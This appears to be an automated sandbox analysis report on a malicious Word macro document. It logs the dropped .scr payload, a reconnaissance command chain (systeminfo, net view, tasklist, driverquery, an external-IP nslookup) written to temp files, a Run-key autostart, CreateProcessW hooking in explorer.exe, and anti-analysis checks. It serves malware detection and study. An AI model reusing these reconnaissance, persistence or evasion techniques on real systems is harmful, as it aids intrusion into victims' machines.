Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR446E.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: e41ZuYVo64.docmOLE document summary: title field not present or empty
Source: e41ZuYVo64.docmOLE document summary: author field not present or empty
Source: e41ZuYVo64.docmOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............8...9..................................w........................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .O.p.e.r.a.t.i.n.g. .S.y.s.t.e.m. .I.n.f.o.r.m.a.t.i.o.n. ...........P...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)uX.............)u..0.............(...W..................................w........................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .C.o.m.p.u.t.e.r. .I.n.f.o.r.m.a.t.i.o.n. ..................w....D...@...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(...e...............t...........X......wX.......................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .P.r.o.c.e.s.s.o.r. .I.n.f.o.r.m.a.t.i.o.n. .........X......wX.......B...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(...t...............\............$.....w.$......................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .B.I.O.S. .I.n.f.o.r.m.a.t.i.o.n. .......\............$.....w.$......8...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(......................................w........................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .I.n.p.u.t. .L.o.c.a.l.e. .I.n.f.o.r.m.a.t.i.o.n. ..........w........H...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(...a..................................vx.......................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .T.i.m.e.Z.o.n.e. .I.n.f.o.r.m.a.t.i.o.n. ..................vx.......@...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(...x..................................vx.......................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .P.r.o.f.i.l.e. .I.n.f.o.r.m.a.t.i.o.n. ....................vx.......>...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(...G..................................w........................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .P.a.g.e.f.i.l.e. .I.n.f.o.r.m.a.t.i.o.n. ..................w........@...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.............(...x...............x............#.....w.#......................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .H.o.t.f.i.x. .I.n.f.o.r.m.a.t.i.o.n. ................#.....w.#......<...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)ut.............)u..0.............(...................,..................w........................Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u........L.o.a.d.i.n.g. .N.e.t.w.o.r.k. .C.a.r.d. .I.n.f.o.r.m.a.t.i.o.n. ..........w....`...H...............Jump to behavior
Source: C:\Windows\System32\systeminfo.exeConsole Write: ..........)u..........)u..............)u..0.................W...............D.b...........?. ...........................Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ....................S.y.s.t.e.m. .e.r.r.o.r. .6.1.1.8. .h.a.s. .o.c.c.u.r.r.e.d.............t.,.%t....,.B...........8...Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ..........................0.............................................r.r.e.d.............t.,.%t....,.......&.........Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ....................a.+u..0.....................................................8...........t.,.%t..................8...Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ..........................0.....................................................8...........t.,.%t....,.................Jump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\text.doc.16147.scrKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Users\user\text.doc.16147.scr C:\Users\user\text.doc.16147.scr
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknownProcess created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\text.doc.16147.scr C:\Users\user\text.doc.16147.scrJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo.exe Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\driverquery.exe driverquery.exe Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D4B04E1-1331-11d0-81B8-00C04FD85AB4}\InprocServer32Jump to behavior
Uses systeminfo.exe to query system informationShow sources
Source: unknownProcess created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Uses tasklist.exe to query information about running processesShow sources
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Document contains an embedded VBA with many randomly named variablesShow sources
Source: e41ZuYVo64.docmStream path 'VBA/J04Xt' : High entropy of concatenated variable names
Source: e41ZuYVo64.docmStream path 'VBA/JtuJu' : High entropy of concatenated variable names
Source: e41ZuYVo64.docmStream path 'VBA/LKfy2' : High entropy of concatenated variable names
Source: e41ZuYVo64.docmStream path 'VBA/ThisDocument' : High entropy of concatenated variable names
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00390600 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,16_2_00390600
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01414F47 push ecx; ret 3_2_01414F57
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003881D1 push ecx; mov dword ptr [esp], 00000002h16_2_003881D2
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00395C3B push ecx; ret 16_2_00395C4B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037EF45 push 8B003994h; ret 16_2_0037EF50
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00634F47 push ecx; ret 16_2_00634F57

Persistence and Installation Behavior:

barindex
Drops PE files with a suspicious file extensionShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scrJump to dropped file
Drops PE filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scrJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scrJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scrJump to dropped file
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)Show sources
Source: C:\Users\user\text.doc.16147.scrWindow found: window name: ProgManJump to behavior
Creates an autostart registry keyShow sources
Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AuxixppsJump to behavior
Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AuxixppsJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
Source: explorer.exeIAT of a user mode module has changed: module: kernel32.dll function: CreateProcessW address: 75329000
Modifies the prolog of user mode functions (user mode inline hooks)Show sources
Source: explorer.exeUser mode code has changed: module: kernel32.dll function: CreateProcessW new code: 0xE9 0x9C 0xC7 0x74 0x48 0x8A
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\D4A4208A-23CA-2629-4D48-07BAD1FC2B8EJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Evasive VBA macro found (CPU number check)Show sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API Environ("NUMBER_OF_PROCESSORS")Name: Document_Open
Found stalling execution ending in API Sleep callShow sources
Source: C:\Users\user\text.doc.16147.scrStalling execution: Execution stalls by calling Sleepgraph_3-2763
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeStalling execution: Execution stalls by calling Sleep
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_ComputerSystem
